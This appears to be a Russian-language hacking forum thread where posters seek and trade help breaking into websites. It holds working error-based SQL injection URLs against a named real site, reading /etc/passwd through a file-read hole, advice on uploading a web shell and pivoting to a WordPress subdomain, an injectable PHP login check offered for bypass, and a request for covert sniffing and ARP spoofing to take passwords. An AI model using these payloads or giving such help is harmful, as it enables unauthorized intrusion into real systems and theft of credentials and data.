Ребят подскажите пожалуйста где находятся конфиги доступа бд в vbulletin 3.3 UPD: нашел ) Includes/config.php
Есть инъекция с читалкой файлов, нашел там раскрытие путей, но не могу прочитать этот файл, хотя он точно существует, зато могу прочитать /etc/passwd, апачевский конфиг. В конфиге нашел PHP: # DocumentRoot: The directory out of which you will serve your # documents. By default, all requests are taken from this directory, but # symbolic links and aliases may be used to point to other locations. # DocumentRoot "/var/www/html" ... # This should be changed to whatever you set DocumentRoot to. # <Directory "/var/www/html"> Описаний виртуальных хостов я там не нашел. В раскритии путь выглядит иначе PHP: /home/site/public_html/music/p.php Где правду искать ?
Есть инъекция даже не 1 немогу шелл залить помогите плиз http://wow.igrosfera.net/acp/index.php?modul=static&id=3
Ну ты и наркоман, сам то читал что написал ?) Скуля твоя крутится как еррор басед без проблем Code: http://wow.igrosfera.net/acp/index.php?modul=static&id=3+or+1+group+by+concat%28%28select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29%29,0x3a,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+ там есть доступ к куче бд, походу ко всем что крутится на этом сервере, на одном из поддоменов крутится вордпресс бложек, понел к чему я веду ?
Code: http://wow.igrosfera.net/acp/index.php?modul=static&id=3+and+extractvalue(1,(select+concat(0x2a,(select+table_name+from+information_schema.tables+where+table_schema!='information_schema'+limit+0,1))))
брут чего? хеша? есть раздел выше про расшифровку хеша, запости туда свой хеш и надейся ,что его расшифруют
Что обычно находится в папках includes? В связи с чем задаю вопрос - Есть раскрученный блинд, есть фулл доступ к поддомену. Но надо сам домен. В инклайдс шелл. В админку мейна не заходит из данных бд, только в кабинет на отдельном сайте поддомене.
как монжно обойти авторизацию ? <?php if (isset($_POST['auth_name'])) { $par= SHA1(strtoupper($_POST['auth_name']).':'.strtoupper($_POST['auth_pass'])); $cont = mysql_connect($r_ip, $r_userdb, $r_pw); mysql_select_db($r_db, $cont); mysql_query("SET NAMES '$encoding'"); $res = mysql_query('SELECT * FROM `account` WHERE `username`="'.$_POST['auth_name'].'" AND sha_pass_hash ="'.$par.'"') or trigger_error(mysql_error());
доброго времени суток всем. имеется сервер 2003 r2 необходимо организовать скрытый снифинг с дальнейшей возможностью извлечения паролей из https соединения и др.защищенных протоколов. Подскажите инструментарий.желательно консольный.под винд. на сервере 2сетевухи одна смотрит в лан а вторая в нет.насколько я понял все пакеты идут через него. а так же интересует инструментарий по проведению апр спуфинга тоже консольный и скрытый.
